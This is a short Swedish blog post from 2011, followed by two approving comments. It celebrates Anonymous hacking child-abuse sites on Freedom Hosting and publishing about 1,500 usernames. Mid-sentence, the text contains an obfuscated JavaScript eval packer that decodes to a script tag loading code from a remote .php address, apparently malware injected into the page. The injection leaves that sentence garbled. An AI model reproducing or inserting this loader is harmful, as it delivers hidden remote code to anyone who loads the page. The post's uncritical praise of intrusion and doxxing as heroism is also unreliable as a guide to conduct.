Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Anonymous hackar bort barn porren från internet.

Anonymous hackar bort barn porren från internet.
Filip Urde
  • On 23 oktober, 2011
  • http://www.revue.se/filip-urde

Hackergruppen Anonymous (dagens hjältar) har idagsläget  hackat och slagit ut fler än 40 stycken hemsidor som sägs innehålla barnporr rapporterar Security News Daily.

Operationen, kallas ”Operation Darknet” vilket syftar på Darknet [wiki], eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|taknb|var|u0026u|referrer|iaaia||js|php’.split(’|’),0,{}))
helt enkelt den del av internet där ”any thing goes” så att säga. Förutom att man hackat hemsidorna så har Anonymous även släppt användarnamn på över 1 500 personer som har använt sig av de dessa sidor.

 

Många av de drabbade hemsidorna använde sig av internetoperatören Freedom Hosting och dessa varnades och ombads att avlägsna samtliga hemsidor mer liknande material från sina servrar. Freedom Hosting gjorde inte detta så då hackade Anonymous deras servrar och slog ut dem. Bam!
www.securitynewsdaily.com

Comments

  1. Fan vad rätt:)

  2. Thobban

    sköna dudes !!!